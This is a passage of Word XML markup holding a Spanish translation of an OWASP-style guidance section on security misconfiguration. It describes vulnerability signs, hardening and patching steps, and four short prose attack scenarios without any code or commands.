                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-69215</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>1118045</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8241030" cy="828040"/>
                  <wp:effectExtent l="0" t="0" r="762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44351C.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId85">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8241030" cy="828040"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="002570A2">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>La configuración de seguridad incorrecta es un problema muy común y se debe en parte a establecer la configuración de forma manual, ad hoc o por omisión (o directamente por la falta de configuración). Son ejemplos: S3 buckets abiertos, cabeceras HTTP mal configuradas, mensajes de error con contenido sensible, falta de parches y actualizaciones, frameworks, dependencias y componentes desactualizados, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DD6C07" w:rsidRPr="00912EEA" w:rsidRDefault="00DD6C07" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00167841" w:rsidRPr="00912EEA" w:rsidTr="00296F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rsidR="00912EEA" w:rsidRPr="00DD6C07" w:rsidRDefault="00912EEA" w:rsidP="00DD6C07">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD6C07">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los atacantes a menudo intentarán explotar vulnerabilidades sin parchear o acceder a cuentas por defecto, páginas no utilizadas, archivos y directorios desprotegidos, etc. para obtener acceso o conocimientos del sistema o del negocio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00DD6C07">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuraciones incorrectas de seguridad pueden ocurrir en cualquier nivel del </w:t>
            </w:r>
            <w:r w:rsidR="00FD2E47" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">stack </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tecnológico, incluidos los servicios de red, la plataforma, el servidor web, el servidor de aplicaciones, la base de datos, frameworks, el código personalizado y máquinas virtuales preinstaladas, contenedores, etc. Los escáneres automatizados son útiles para detectar configuraciones predeterminadas, servicios innecesarios, opciones heredadas, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00DD6C07">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Los defectos frecuentemente dan a los atacantes acceso no autorizado a algunos </w:t>
            </w:r>
            <w:r w:rsidR="00DD6C07" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>datos</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> o funciones del sistema. Ocasionalmente, estos errores resultan en un completo compromiso del sistema.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00DD6C07">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El impacto al negocio depende de las necesidades de la aplicación y de los datos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00A71184" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A71184">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Falta hardening adecuado en cualquier parte del stack tecnológico, o permisos mal configurados en los servicios de la nube. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00A71184" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A71184">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Se encuentran instaladas o habilitadas características innecesarias (ej. puertos, servicios, páginas, cuentas o permisos). </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00A71184" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A71184">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Las cuentas predeterminadas y sus contraseñas siguen activas y sin cambios. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00A71184" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A71184">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El manejo de errores revela a los usuarios trazas de la aplicación u otros mensajes demasiado informativos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00A71184" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A71184">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Para los sistemas actualizados, las nuevas funciones de seguridad se encuentran desactivadas o no se encuentran configuradas de forma adecuada o segura. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00A71184" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A71184">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Las configuraciones de seguridad en el servidor de aplicaciones, en el framework de aplicación (ej., Struts, Spring, ASP.NET), bibliotecas o bases de </w:t>
            </w:r>
            <w:r w:rsidRPr="00A71184">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">datos no se encuentran especificados con valores seguros. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00A71184" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A71184">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">El servidor no envía directrices o cabeceras de seguridad a los clientes o se encuentran configurados con valores inseguros. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A71184">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El software se encuentra desactualizado o posee vulnerabilidades</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Deben implementarse procesos seguros de instalación, incluyendo:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Proceso de fortalecimiento reproducible que agilice y facilite la implementación de otro entorno asegurado. Los entornos de desarrollo, de control de calidad (QA) y de Producción deben configurarse de manera idéntica y con diferentes credenciales para cada entorno. Este proceso puede automatizarse para minimizar el esfuerzo requerido para configurar cada nuevo entorno seguro. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Use una plataforma minimalista sin funcionalidades innecesarias, componentes, documentación o ejemplos. Elimine o no instale frameworks y funcionalidades no utilizadas. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Siga un proceso para revisar y actualizar las configuraciones apropiadas de acuerdo a las advertencias de seguridad y siga un proceso de gestión de parches. En particular, revise los </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">permisos de almacenamiento en la nube (por ejemplo, los permisos de buckets S3). </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">La aplicación debe tener una arquitectura segmentada que proporcione una separación efectiva y segura entre componentes y acceso a terceros, contenedores o grupos de seguridad en la nube (ACLs). </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Envíe directivas de seguridad a los clientes (por ej. cabeceras de seguridad). </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00A71184">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Utilice un proceso automatizado para verificar la efectividad de los ajustes y configuraciones en todos los ambientes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00F01205">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #1: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F01205">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>el servidor de aplicaciones viene con ejemplos que no se eliminan del ambiente de producción. Estas aplicaciones poseen defectos de seguridad conocidos que los atacantes usan para comprometer el servidor. Si una de estas aplicaciones es la consola de administración, y las cuentas predeterminadas no se han cambiado, el atacante puede iniciar una sesión.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00F01205" w:rsidRDefault="00912EEA" w:rsidP="00F01205">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Escenario #2: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F01205">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>el listado de directorios se encuentra activado en el servidor y un atacante descubre que puede listar los archivos. El atacante encuentra y descarga las clases de Java compiladas, las descompila, realiza ingeniería inversa y encuentra un defecto en el control de acceso de la aplicación.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00F01205" w:rsidP="00F01205">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #3: </w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00F01205">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>la configuración del servidor de aplicaciones permite retornar mensajes de error detallados a los usuarios, por ejemplo, las trazas de pila. Potencialmente esto expone información sensible o fallas subyacentes, tales como versiones de componentes que se sabe que son vulnerables.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00F01205" w:rsidP="00F01205">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Escenario #4:</w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00F01205">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>un proveedor de servicios en la nube (CSP) por defecto permite a otros usuarios del CSP acceder a sus archivos desde Internet. Esto permite el acceso a datos sensibles almacenados en la nube.</w:t>
            </w:r>
          </w:p>
